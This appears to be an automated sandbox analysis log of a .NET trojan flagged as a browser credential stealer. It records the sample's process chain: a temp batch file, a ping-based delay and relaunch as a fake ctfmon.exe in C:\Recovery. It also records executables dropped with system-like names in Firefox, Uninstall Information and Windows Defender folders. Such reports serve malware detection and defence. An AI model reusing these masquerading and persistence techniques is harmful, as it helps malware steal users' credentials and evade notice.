                            Source: RYCtQXXs.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: rIogOAZx.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: oPZxcDoy.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: ypIvhwSa.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: pHpfyUNt.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: gdhqOayL.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: WuNaeyse.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: NLuKuVnw.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: HpjdguSK.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: FfNcgcmK.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: oYwxMpHv.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: WLUssUmg.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: MdBcJrhy.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: EzsmZyRR.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: CpWmZfmQ.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: cExRVzrV.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: hyuiZSvj.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: sdoGeuPL.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: ZRNAKZux.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: QitkawpP.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: HFlvrDZi.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: yWRfHaUA.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: psJpXhFT.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: fKqanEzl.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: dzUZnmUk.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: WbWKDcuD.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: VWLjDtED.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: LnsTTQzV.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: CJjejXjo.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: jswyQSZZ.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: ZJdigpUr.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: ICMDMDoc.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: zTtncajv.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: yOiNcrtu.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: iMcIJnEg.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: XYySZcJy.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: FMWMFGoj.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: vdCwVejC.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: eWmRCrDn.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: cLPQBZYm.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: Cbqwysdq.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: 85D5ktqjpd.exe, 00000000.00000002.1738426023.000000000391F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs 85D5ktqjpd.exe
                            Source: 85D5ktqjpd.exe, 00000000.00000002.1755774464.000000001C36B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs 85D5ktqjpd.exe
                            Source: 85D5ktqjpd.exe, 00000000.00000002.1755774464.000000001C36B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs 85D5ktqjpd.exe
                            Source: 85D5ktqjpd.exe, 00000000.00000002.1738426023.0000000003820000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs 85D5ktqjpd.exe
                            Source: 85D5ktqjpd.exe, 00000000.00000002.1738285943.00000000032F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBrowsersStealer_native.dll" vs 85D5ktqjpd.exe
                            Source: 85D5ktqjpd.exe, 00000000.00000002.1755424635.000000001C242000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs 85D5ktqjpd.exe
                            Source: 85D5ktqjpd.exe, 00000000.00000002.1738426023.0000000003909000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs 85D5ktqjpd.exe
                            Source: 85D5ktqjpd.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs 85D5ktqjpd.exe
                            Source: 85D5ktqjpd.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: classification engineClassification label: mal100.troj.evad.winEXE@10/73@0/1
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Program Files\Mozilla Firefox\uninstall\upfc.exeJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\Desktop\rIogOAZx.logJump to behavior
                            Source: C:\Recovery\ctfmon.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_03
                            Source: C:\Recovery\ctfmon.exeMutant created: \Sessions\1\BaseNamedObjects\Local\6221a3ce11ad15d7fc6881b7016cb4cb64da46691841946f781729876ccb1b99
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile created: C:\Users\user\AppData\Local\Temp\UorNf9LNUtJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KgQDHOJvgq.bat"
                            Source: 85D5ktqjpd.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: 85D5ktqjpd.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            Source: C:\Recovery\ctfmon.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile read: C:\Users\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: 85D5ktqjpd.exeVirustotal: Detection: 62%
                            Source: 85D5ktqjpd.exeReversingLabs: Detection: 83%
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile read: C:\Users\user\Desktop\85D5ktqjpd.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\85D5ktqjpd.exe "C:\Users\user\Desktop\85D5ktqjpd.exe"
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KgQDHOJvgq.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\ctfmon.exe "C:\Recovery\ctfmon.exe"
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KgQDHOJvgq.bat" Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\ctfmon.exe "C:\Recovery\ctfmon.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: dlnashext.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: wpdshext.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: version.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: textshaping.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: textinputframework.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: coreuicomponents.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Recovery\ctfmon.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                            Source: C:\Recovery\ctfmon.exeAutomated click: OK
                            Source: C:\Recovery\ctfmon.exeAutomated click: OK
                            Source: C:\Recovery\ctfmon.exeAutomated click: OK
                            Source: C:\Recovery\ctfmon.exeAutomated click: OK
                            Source: C:\Recovery\ctfmon.exeAutomated click: OK
                            Source: C:\Recovery\ctfmon.exeAutomated click: OK
                            Source: C:\Recovery\ctfmon.exeAutomated click: OK
                            Source: C:\Recovery\ctfmon.exeAutomated click: OK
                            Source: C:\Recovery\ctfmon.exeAutomated click: OK
                            Source: C:\Recovery\ctfmon.exeAutomated click: OK
                            Source: C:\Recovery\ctfmon.exeAutomated click: OK
                            Source: C:\Recovery\ctfmon.exeAutomated click: OK
                            Source: C:\Recovery\ctfmon.exeAutomated click: OK
                            Source: C:\Recovery\ctfmon.exeAutomated click: OK
                            Source: C:\Recovery\ctfmon.exeAutomated click: OK
                            Source: C:\Recovery\ctfmon.exeAutomated click: OK
                            Source: C:\Recovery\ctfmon.exeAutomated click: OK
                            Source: C:\Recovery\ctfmon.exeAutomated click: OK
                            Source: C:\Recovery\ctfmon.exeAutomated click: OK
                            Source: C:\Recovery\ctfmon.exeAutomated click: OK
                            Source: C:\Recovery\ctfmon.exeAutomated click: OK
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDirectory created: C:\Program Files\Mozilla Firefox\uninstall\upfc.exeJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDirectory created: C:\Program Files\Mozilla Firefox\uninstall\ea1d8f6d871115Jump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDirectory created: C:\Program Files\Uninstall Information\XWWZQvSvBozA.exeJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDirectory created: C:\Program Files\Uninstall Information\72f9cbbcf2062aJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDirectory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeJump to behavior
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDirectory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\24dbde2999530eJump to behavior
                            Source: 85D5ktqjpd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: 85D5ktqjpd.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                            Source: 85D5ktqjpd.exeStatic file information: File size 4515328 > 1048576
                            Source: 85D5ktqjpd.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x3b7e00
                            Source: 85D5ktqjpd.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbI source: ctfmon.exe, 00000005.00000002.2972545766.000000001B860000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: ctfmon.exe, 00000005.00000002.2974289113.000000001BE88000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: ctfmon.exe, 00000005.00000002.2975498327.000000001BF7A000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: ctfmon.exe, 00000005.00000002.2975498327.000000001BF7A000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: ctfmon.exe, 00000005.00000002.2972545766.000000001B860000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Recovery\ctfmon.PDB^ source: ctfmon.exe, 00000005.00000002.2972545766.000000001B8BF000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: ctfmon.exe, 00000005.00000002.2975498327.000000001BF7A000.00000004.00000020.00020000.00000000.sdmp
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeCode function: 0_2_00007FFD9B8B4C62 push edx; retf 0_2_00007FFD9B8B4C6F
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeCode function: 0_2_00007FFD9B8B00BD pushad ; iretd 0_2_00007FFD9B8B00C1
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeCode function: 0_2_00007FFD9BA729ED pushad ; iretd 0_2_00007FFD9BA72A01
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeCode function: 0_2_00007FFD9BA77967 push ebx; retf 0_2_00007FFD9BA7796A
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeCode function: 0_2_00007FFD9BFB7C5F push eax; retf 0_2_00007FFD9BFB7C6D
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeCode function: 0_2_00007FFD9BFB88FF push FFFFFFE8h; retf 0_2_00007FFD9BFB89F1
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeCode function: 0_2_00007FFD9BFB7567 push ebx; iretd 0_2_00007FFD9BFB756A
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeCode function: 0_2_00007FFD9BFB896C push FFFFFFE8h; retf 0_2_00007FFD9BFB89F1
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeCode function: 0_2_00007FFD9BFB8164 push ebx; ret 0_2_00007FFD9BFB816A
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeCode function: 0_2_00007FFD9BFB8970 push FFFFFFE8h; retf 0_2_00007FFD9BFB89F1
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeCode function: 0_2_00007FFD9BFB7C2F pushad ; retf 0_2_00007FFD9BFB7C5D
                            Source: C:\Recovery\ctfmon.exeCode function: 5_2_00007FFD9BAD4C62 push edx; retf 5_2_00007FFD9BAD4C6F
                            Source: C:\Recovery\ctfmon.exeCode function: 5_2_00007FFD9BAD00BD pushad ; iretd 5_2_00007FFD9BAD00C1
                            Source: C:\Recovery\ctfmon.exeCode function: 5_2_00007FFD9BAF24DB push eax; iretd 5_2_00007FFD9BAF24DC
                            Source: C:\Recovery\ctfmon.exeCode function: 5_2_00007FFD9BAF24D4 push eax; iretd 5_2_00007FFD9BAF24D5
                            Source: C:\Recovery\ctfmon.exeCode function: 5_2_00007FFD9BC933A5 pushad ; iretd 5_2_00007FFD9BC933B9
                            Source: C:\Recovery\ctfmon.exeCode function: 5_2_00007FFD9C1D7C5F push eax; retf 5_2_00007FFD9C1D7C6D
                            Source: C:\Recovery\ctfmon.exeCode function: 5_2_00007FFD9C1D88FF push FFFFFFE8h; retf 5_2_00007FFD9C1D89F1
                            Source: C:\Recovery\ctfmon.exeCode function: 5_2_00007FFD9C1D896C push FFFFFFE8h; retf 5_2_00007FFD9C1D89F1
                            Source: C:\Recovery\ctfmon.exeCode function: 5_2_00007FFD9C1D7567 push ebx; iretd 5_2_00007FFD9C1D756A
                            Source: C:\Recovery\ctfmon.exeCode function: 5_2_00007FFD9C1D8164 push ebx; ret 5_2_00007FFD9C1D816A
                            Source: C:\Recovery\ctfmon.exeCode function: 5_2_00007FFD9C1D8970 push FFFFFFE8h; retf 5_2_00007FFD9C1D89F1
